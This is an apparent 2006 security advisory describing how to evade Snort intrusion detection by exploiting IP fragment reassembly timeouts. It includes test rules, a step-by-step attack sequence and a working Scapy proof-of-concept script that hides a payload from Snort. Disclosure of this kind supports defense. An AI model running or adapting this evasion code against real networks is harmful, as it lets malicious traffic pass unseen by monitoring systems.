Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11268
HistoryFeb 02, 2006 - 12:00 a.m.

Verified evasion in Snort

2006-02-0200:00:00
vulners.com
6

<pre>
Dan Kaminsky gave a presentation at shmoocon and mentioned using
ip fragmentation timers to evade intrusion detection systems. It's
a pretty straightforward technique and easy to code up so we
decided to look and see if Snort was vulnerable.


We added a couple of rules

alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"Found Generic ICMP Packet"; icode:0; itype:8; classtype:misc-activity; sid:384; rev:5;)
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"Found BadStuff"; content:"BADSTUFF";icode:0; itype:8; classtype:misc-activity; sid:384; rev:5;)

to a snort 2.3.3 config file (gentoo emerge).

We crafted up a quick ping with the string "BADSTUFF" to test our configuration.
Sure enough, snort alerted on the packet. Next we tested that snort was
properly assembly fragments. We fragmented the icmp echo request into two
packets and threw them at the target host. Snort properly reassembled them
in either order and the target returned an echo reply send to a Windows XP
host.

Now for the attack. We crafted 3 fragments. The first contained a standard
icmp ping header. The second contained the BADSTUFF string and the third
contained an alternate GODSTUFF string.

Step 1)

Send over the GODSTUFF packet. The GODSTUFF fragment is recieved by Snort
and the Windows XP machine.

             Snort         WindowsXP

—>GODSTUFF GODSTUFF GODSTUFF

Step 2)

Wait 5 seconds for the fragment to timeout on the XP Host. The frament is
still in the reassembly buffer for Snort.

             Snort         WindowsXP

(Wait 5sec) GODSTUFF

Step 3)

Send over the common ICMP Header. It is recieved by both Snort and the
WindowsXP host.

             Snort         WindowsXP
             GODSTUFF      

—>Header Header Header

Snort now has both pieces it needs for reassembly and reconstructs the framents
into a broken ICMP packet and discards both fragments. The WindowsXP host
now only had the header fragment in the reassembly buffer. (Note: we could have
made the icmp checksum work out, but we didn't have to.)

             Snort         WindowsXP      

—>Header Header

Step 4)

Send over the BADSTUFF packet.

             Snort         WindowsXP
                           Header

—>BADSTUFF BADSTUFF BADSTUFF

The WindowsXP host properly reassembles the icmp packet and sends us back
an icmp echo reply with the BADSTUFF string in it. No alerts from snort.
Eventually the BADSTUFF fragment will silently timeout in Snort's buffer.


This technique could be used to bypass most Snort signatures. It'd be fun
to add a snort-inline plugin to do it automatically when pen-testing. If
Snort cleared the fragments in the reassembly buffer on and icmp fragmentation
reassembly time exceeded message, the attack would be hard to pull off.
Unfortunately, many stacks and hardened systems no longer send out those
messages.

Jason Larsen
Mike Milivich

attached is a proof-of-concept in scapy

#!/usr/bin/python

from scapy import *
from time import sleep
from random import seed
from random import randint

seed the random number generating using the current time

seed(None)

victim

ip = IP(dst="10.4.4.4")

generate a random ID, all of the fragments have to have the

same ID, but we want to use something that the IDS/target isn't

already trying to reassemble

ip.id = randint(0x1000,0x5000)
ip.proto = 0x1 # ICMP protocol number

get just the data part, not the ip header

data1 = str(ip/ICMP(id=0x8236, seq=83)/("BADSTUFF"))[len(ip):]
data2 = str(ip/ICMP(id=0x8236, seq=83)/("GODSTUFF"))[len(ip):]

split into fragments

splitLoc = 8
frag1 = data1[:splitLoc]
frag2 = data1[splitLoc:]
frag2Good = data2[splitLoc:]

send the fragments

send the "good" fragment

ip.flags = 0
ip.frag = splitLoc / 8
send(ip/frag2Good)

wait for good fragment to timeout on the target, this will change

depending on the target… 5 seconds worked against a test windows box

sleep(5)

send the first fragment which causes the IDS to reassemble

ip.flags = 1
ip.frag = 0
send(ip/frag1)

send the bad fragment to reassemble on the target, sits in the IDS

until the IDS flush's it from the fragment cache

ip.flags = 0
ip.frag = splitLoc / 8
send(ip/frag2)

</pre>